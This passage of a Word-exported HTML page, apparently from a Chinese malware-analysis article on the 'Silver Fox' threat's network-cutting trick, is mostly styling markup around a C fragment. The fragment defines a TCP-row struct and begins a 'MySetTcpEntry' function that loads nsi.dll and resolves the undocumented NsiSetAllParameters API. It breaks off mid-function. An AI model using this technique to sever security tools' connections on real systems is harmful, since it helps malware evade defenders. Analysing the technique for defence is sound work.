style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD localAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">BYTE</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">reserved1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">20</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">];</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">remoteAddrFamily</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">remotePort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD remoteAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">BYTE</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">reserved2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">20</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">];</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Custom replacement for SetTcpEntry using undocumented NSI API</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD MySetTcpEntry</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">MIB_TCPROW_OWNER_PID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">typedef</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WINAPI</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NsiSetAllParameters_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">DWORD, DWORD, LPVOID, DWORD, LPVOID, DWORD, LPVOID, DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Load NSI module and resolve function</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HMODULE hNsi </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> LoadLibraryA</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;nsi.dll&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hNsi</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">NsiSetAllParameters_t pNsiSetAllParameters </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NsiSetAllParameters_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetProcAddress</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hNsi, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;NsiSetAllParameters&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pNsiSetAllParameters</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span 